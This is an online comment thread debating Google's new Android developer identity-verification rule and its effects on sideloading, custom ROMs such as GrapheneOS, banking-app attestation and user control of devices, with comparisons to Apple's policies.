Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
Google Play is not open source. You're still free to sideload on phone that use vanilla open-source android like the Fairphone.
Apple will disagree and the first company doing worst than this, and is the world's first trillion dollars company.
Money talks.
One of those would be in corrupt countries you don’t have the „trusted 3rd party”
https://www.bbc.com/news/magazine-26328105
https://en.wikipedia.org/wiki/Parents_Music_Resource_Center
https://en.wikipedia.org/wiki/Seduction_of_the_Innocent
https://www.nytimes.com/1997/02/27/business/job-insecurity-o...
Yanking the leash of the proletariat
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
No comments yet
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
I'm all for code signing and integrity verification. We need both technologies on pretty much all devices.
You are just conflating two different issues - side loading has nothing to do with device integrity.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
In what way? Seriously, what benefit is there? (And don't say security...)
The world would be a much better place if we only had calls and direct messages.
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
Right until their devices start to act against their will.
The device integrity is are talking about it integral only to Google and Apple. Not to you.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
So yeah, its different and more aecure
Installer software signing certificates that will satisfy MS are prohibitively expensive for hobbyists (hundreds per year).
Currently the entire ecosystem is riddled with malware, spyware, or adware with shady source information and people have no way to verify the data practices
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
From: https://developer.android.com/developer-verification
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
The amount of people this makes angry is so minuscule that it probably wouldn’t even pass one of those theatrical “sign this petition to get the government to discuss it” thingy. Mind you, the only reason the whole side-loading court cases were going forward is because a giganormous company (Epic) wanted to make more money instead of paying the Google/Apple tax. Not because some people were angry.
I don't think that's it. The desktop OS situation has historically be similar with 2 major large players and a bunch of insignificant ones.
This comes down to user expectation.
There are two OS platforms for desktop/laptop usage: MacOS Windows
These both contain ways to run arbitrary compiled code from an arbitrary source -- like a computer should. Losing this feature of our smartphones should have everyone concerned.
And they're both working towards taking that away.
For now we have Linux as a 3rd option, but that only exists so long as there's hardware available that'll let you run it. Can easily imagine a near-future where you can only get 'Windows hardware' or 'Apple hardware' and nothing modern that'll boot a 3rd-party OS.
For precedent, Microsoft locked down their own ARM hardware to Windows.
I'd be interested in further reading on Google's outreach to big banks and major finance CO's ( or others) pushing for device attestation if you have any further reading.
This is political fantasy. There is no mechanism for "the people" to force anyone to roll this back. They can vote for the candidate owned by google, or the candidate owned by google. If they want to find another candidate, they'll have to use google to find one.
A very striking way to illustrate this is to look at the career histories of high government officials even very late into the Soviet Union. The last Minister of Coal, Mikhail Shchadov, was born in a village, worked in a mine, went to mining school for engineering, became head of his mine, and thereafter worked his way up the ranks until he was head of the whole apparatus. This story, not that of inherited wealth or monopolistic oligarchs, dominates the histories of Soviet ministers even very late in the decline of the Union.
Where is the "other set" of oligarchs of which you speak? There is none, which means there is hope for workers who might wish to enact fundamental economic change.
But often people try to project their opinions onto "the people" and predict they will rise up, and there's probably 100 predictions in comment sections that are completely spurious to every one that actually happens
So I'm not sure, but if I had to guess this one is a rare case where there may be real prospect of backlash.
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
What else are you growing?
This concept originated in China and is spreading. Beware.
> Mobile Payments They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents - Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know) - All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet). - Your phone is stolen: you lost all the ways to contact people, but you can buy another one - Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
A locked-down Android is pointless.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
BTW, all the GrapheneOS, etc. are still Android phones.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
SailfishOS is pretty nice
I might get one next
https://developer.sony.com/open-source/aosp-on-xperia-open-d...
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
https://furilabs.com/shop/flx1/
And if what you want is a PDA that runs Linux, there are many options, e.g. https://www.clockworkpi.com/home-uconsole.
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryprographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
Is anyone working on fixing this? We can do so much better.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
[1] https://grapheneos.org/usage#banking-apps
Fairphone from the Netherlands is another https://www.fairphone.com/
I have a Fairphone and i get updates pretty frequently so not sure what you mean?
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
I guess words don't don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
Personally I would be fine with unsigned apps requiring the user to click through a notice before install, or having a setting to toggle to enable unsigned apps. Windows does something similar to this where unsigned binaries get a pop up warning but signed ones are executed immediately.
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am a I misremembering and/or has something changed in this process? Am I missing something?
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully manages mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
It's been there since Android 1.0.
What's missing is a way for the user to deny it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
https://developer.android.com/develop/connectivity/network-o...
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
Hey we were already on board with this, you don't have to convince us.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
> The tech giant stresses that this does not mean developers can’t distribute outside of the Play Store through other app stores or via sideloading — Android will remain open in that regard.
These big companies need to be broken into a thousand pieces. They’re starting to become the gatekeepers of participating in society.
> I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
I wasn't trying to claim everything is hunky dory, just that they aren't "going to just ban" other app stores.
>The Play Store implemented similar requirements in 2023, but Google is now mandating this for all install methods, including third-party app stores and sideloading where you download an APK file from a third-party source.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
Google can't even stop the scam ai companion apps on the play store that all use the same same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with ai generated pictures and videos of politicians.
Get real Google.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
Funnily, Google is one the few phone manufacturers who can’t make emergency calls to work. (e.g. search Pixel problems)
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
They've been chipping away at this over the years. Safetynet was the first offense, but if they start restricting app installation from sources of my choice (I hate the term "sideloading"), there's not much advantage left.
Google doesn't make better phones, they were just less hostile to the consumer. That seems to be going away :(
And saying that for me anyways the only reason I have an Android and not an IPhone is because they were less abusive. On unrelated metrics like hardware quality Apple generally seems to do better.
I have a stroke everytime I try to navigate settings on a iPhone each time someone asks. It's like they don't want you to try and change anything, ever.
And the person you're responding to was pretty clear that the issue if they both do the same thing, Google has no edge in devices.
The thing is that if Google choses to make Android OS as closed as iOS, I'd rather use an iPhone than an Android phone...
Leaving Google for Apple, and expecting a more open app store, is going to be disappointing. I’m not a Google fanboy by any means, just pointing out the landscape out there
By itself, this throttling is a good thing and keeps phones usable for longer, because a phone that is slow is better than a phone that randomly reboots.
The problematic part was that they a) didn't disclose it, and b) did this for phones within the warranty period, so instead of the phone visibly crashing and you returning the obviously broken phone, it just lost performance which you might not have noticed in time to get a free replacement.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
https://www.androidauthority.com/nexus-6p-bootloop-fix-78930...
It wasn’t guise, it actually increased the battery life quite much. People complained about the battery of old phones. The problem was that users did not have choice to opt-out.
Apple wouldn't have had to do all the song and dance if from the start a popup warned the users their battery lost capacity and should be serviced.
It's not about 'saving battery' its about preventing undervoltage that janks everything up.
Having dealt with more than one windows phone that didn't have this feature or had it in a bad way (i.e. 520/521 would just 'reboot', 640 and 950XL would just kill an app) I wish Microsoft would have figured that crap out lol.
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
https://www.androidauthority.com/nexus-6p-lawsuit-2019-97547...
I've said this before, but it was the right idea executed the wrong way. iPhones give you a warning when they overheat, and this throttling should have gotten a similar warning with a link to an FAQ explaining the battery dynamics.
That’s not a true story.
You can also use an enterprise developer certificate that lasts forever but if Apple revokes it then the app stops working until you get another working cert.
It does require you to turn on iOS developer settings by connecting to a Mac with Xcode installed to enable but then you can manage app installation and refreshing via an App Store like Alt Store. EU has different system where there is no limit on amount of sideloadable apps but the apps still need to be approved by Apple. Alt Store also have a EU specific App Store for that purpose.
I side loaded on iOS for a long time. Get Youtube++ for ad free and I forget the Reddit client I used that was side loaded as well. You can run the server on any PC or Mac that will handle side loaded apps and being on the same WiFi network allows the server to automatically refresh the installed apps. Only big downside is updates are not automatic or simple. To update an app you have to download the new app .ipa and then sign it like you were installing it fresh. Usually it picks up the existing configs and data though. So it's not a full app wipe.
The sideloaded subreddit is where I got into it through.
Otherwise, I think it's possible to use developer tools to temporarily install apps on an iPhone. IIRC this requires a Mac and has to be repeated every few days.
7 days for free account.
1 year for paid (until membership ends?).
90 days for TestFlight.
* Only in europe
** kinda
*** you have to enable it in your account settings
**** you have to reinstall it every 30 days
***** more I forgot
****** fuck you - apple
The issue is that the good news are often incremental, while the bad news come in large steps, which makes them much more noticeable.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
https://support.google.com/googleplay/android-developer/thre...
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
source: https://en.m.wikipedia.org/wiki/Toybox
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to to what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
I am gonna start carrying around a laptop with a 5G modem instead.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
It looks like many in this thread are against, but I don't see suggestions for action?
PDAs, now... have a look at https://www.clockworkpi.com/home-uconsole
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The users gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to copy the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
Where a less restricted device can do cool things nobody else can do.
If someone made a screenless powerbank-shaped Android device, I might be interested. The device would double as a 5g wifi modem, and to access the UI you'd remote in over VNC from a laptop, or unrestricted mobile device like a PinePhone.
As to the device you mention, it should be possible to take a phone apart and spoof* all of the mic's and cameras, likely the gps, and haptic motor and speakers as well, and have a 5g touch screen modem with plain internet, or keep the speakers and it's a media device, or put all the audio on a micro switch. * use matched resistors, or black out the sensors detach the antena for gps lets just say I realy dont like bieng advertised to
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
[1] https://news.ycombinator.com/item?id=41895718
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
Don't be evil Google!
Whose smart idea was that.
Isn't this a death knell for F-Droid, at least for running on most hardware? Since they require their own builds/attestation?
The Overton Window for computing keeps inching towards gatekeepers having total control over devices. I can't help but imagine myself lurching along on the last somewhat open hardware I can cobble together in a couple of decades, because I refuse to drink the verification can to continue...
It feels as if that would provide far more of a public service than this... whatever this is.
Are there stats on whether more malware and financial scams come from installed apps or from advertising?
We do not know yet who will be considered "hobbyist". I would say they might check the user base. When hitting app installation threshold for let say 1,000 users, they will force you to pass the full legal check. Otherwise they will start blocking any further installations.
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number. > * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website. > * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
